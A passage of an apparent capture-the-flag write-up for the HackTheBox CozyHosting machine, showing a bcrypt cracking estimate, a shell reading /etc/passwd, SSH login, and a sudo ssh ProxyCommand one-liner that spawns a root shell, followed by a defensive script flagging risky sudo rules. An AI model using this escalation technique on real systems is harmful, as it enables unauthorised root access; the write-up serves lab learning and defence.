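wordlist_seconds() {
    awk -v w="$1" -v r="$2" 'BEGIN { printf "%d\n", w / r }'
}

# Constructed figures: 245.8 c/s is the rate john showed above; 14344391 is the
# line count of Kali's rockyou.txt (assumption; check with wc -l on your copy).
echo "cost=$(bcrypt_cost "$HASH") rounds=$(bcrypt_rounds "$HASH")"
secs=$(wordlist_seconds 14344391 245.8)
echo "full rockyou pass at 245.8 c/s: ${secs}s (~$(( secs / 3600 ))h)"
```

At roughly 16 hours for one pass over rockyou, john only finished in 11 seconds because the password sits a few thousand lines into the list; a cost-10 bcrypt still does its job against anything that is not a dictionary word.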
                                                                                                                                                                                     
    
    app@cozyhosting:/app$ cat /etc/passwd
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
    systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    pollinate:x:105:1::/var/cache/pollinate:/bin/false
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
    syslog:x:107:113::/home/syslog:/usr/sbin/nologin
    uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
    tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
    tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
    landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
    fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
    usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
    lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
    app:x:1001:1001::/home/app:/bin/sh
    postgres:x:114:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    josh:x:1003:1003::/home/josh:/usr/bin/bash
    _laurel:x:998:998::/var/log/laurel:/bin/false
    app@cozyhosting:/app$ 
    
    
    User flag:

    633400af01adcc71fd0a9174a813847c

    ┌──(kwkl㉿kwkl)-[~]
    └─$ ssh josh@10.10.11.230     
    The authenticity of host '10.10.11.230 (10.10.11.230)' can't be established.
    ECDSA key fingerprint is SHA256:dHlbSOhuGjzTNgvvNbEe2LXI3SsauTGXC/Y5kWTJKs4.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.11.230' (ECDSA) to the list of known hosts.
    josh@10.10.11.230's password: 
    Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
      System information as of Mon Oct  2 03:32:14 AM UTC 2023
    
      System load:           0.0
      Usage of /:            53.2% of 5.42GB
      Memory usage:          13%
      Swap usage:            0%
      Processes:             239
      Users logged in:       0
      IPv4 address for eth0: 10.10.11.230
      IPv6 address for eth0: dead:beef::250:56ff:feb9:63e0
    
    
    Expanded Security Maintenance for Applications is not enabled.
    
    0 updates can be applied immediately.
    
    Enable ESM Apps to receive additional future security updates.
    See https://ubuntu.com/esm or run: sudo pro status
    
    
    The list of available updates is more than a week old.
    To check for new updates run: sudo apt update
    
    Last login: Tue Aug 29 09:03:34 2023 from 10.10.14.41
    josh@cozyhosting:~$ ls
    user.txt
    josh@cozyhosting:~$ id
    uid=1003(josh) gid=1003(josh) groups=1003(josh)
    josh@cozyhosting:~$ cat user.txt
    633400af01adcc71fd0a9174a813847c
    josh@cozyhosting:~$ 
    
    josh@cozyhosting:~$ sudo -l
    [sudo] password for josh: 
    Sorry, try again.
    [sudo] password for josh: 
    Matching Defaults entries for josh on localhost:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
    
    User josh may run the following commands on localhost:
        (root) /usr/bin/ssh *
    josh@cozyhosting:~$ 
    
    
    josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
    # 
    # 
    # id
    uid=0(root) gid=0(root) groups=0(root)
    # cat /root/root.txt
    f1714bfee126c2c7107a6ae26fb22b7d
    # 
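The `sudo -l` result is the whole privilege escalation: josh may run `/usr/bin/ssh` as root with any arguments. OpenSSH hands the `ProxyCommand` option to `/bin/sh -c`, so a value that starts with `;` ends the (empty) proxy command and runs whatever follows as root. ssh wires the proxy's stdin and stdout to its own connection pipes, which is why the payload redirects both to stderr (`0<&2 1>&2`): stderr is still the terminal, so the spawned `sh` gets an interactive `#` prompt. The `x` is only a placeholder hostname; the proxy is launched before any connection is attempted. The root cause is the trailing `*`: any binary that accepts option flags capable of executing commands is unsafe behind `(root) ... *`, and if josh genuinely needed ssh as root the rule should name a fixed command line or a wrapper that takes no arguments.

As an added check (not part of the writeup), the script below runs over `sudo -l` output and flags rules whose target binary can spawn a shell. The input text is constructed: the ssh rule is the one from the box, the systemctl and vim rules are invented to show one clean case and one more flagged case. The list of escape-capable binaries is a starting point, not a complete one; GTFOBins is the fuller reference.

```shell
#!/bin/sh
# Added example, not part of the original writeup: scan "sudo -l" output for
# rules whose target binary can hand out a shell, like "(root) /usr/bin/ssh *".

# Constructed input modelled on the writeup. The ssh rule is the real one from
# the box; the systemctl and vim rules are invented for the demonstration.
SUDO_L_OUTPUT='Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
    (root) NOPASSWD: /usr/bin/systemctl status nginx
    (root) /usr/bin/vim /etc/nginx/nginx.conf'

# Programs that can execute arbitrary commands once run as root. A starting
# point only; compare against GTFOBins for your own estate.
ESCAPE_BINS='ssh scp vim vi nano less more man find awk perl python python3 env bash sh dash zsh tar zip'

# risky_sudo_rules: read "sudo -l" text on stdin, print one RISKY line per rule
# whose command basename is in ESCAPE_BINS. A bare "*" argument adds a warning.
risky_sudo_rules() {
    awk -v bins="$ESCAPE_BINS" '
        BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) risky[b[i]] = 1 }
        /may run the following commands/ { inrules = 1; next }
        !inrules || NF == 0 { next }
        {
            # Rule shape: (runas) [TAG: ...] /path/to/bin [args]
            path = ""
            for (i = 1; i <= NF; i++) if ($i ~ /^\//) { path = $i; break }
            if (path == "") next
            base = path; sub(/.*\//, "", base)
            if (!(base in risky)) next
            why = (base == "ssh") ? "ProxyCommand/LocalCommand run via sh -c" : "known shell escape"
            wild = ($NF == "*") ? ", wildcard args" : ""
            sub(/^[ \t]+/, "")
            printf "RISKY: %s  [%s: %s%s]\n", $0, base, why, wild
        }'
}

# Demonstration on the constructed sample.
printf '%s\n' "$SUDO_L_OUTPUT" | risky_sudo_rules
```

Run it as `sudo -l | sh audit.sh` style (feed real output on stdin) for each account you can reach; anything it prints is a candidate for exactly the kind of one-liner used above.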
    
    
    Root flag: f1714bfee126c2c7107a6ae26fb22b7d

  • Original article: https://blog.csdn.net/m0_47210241/article/details/133487936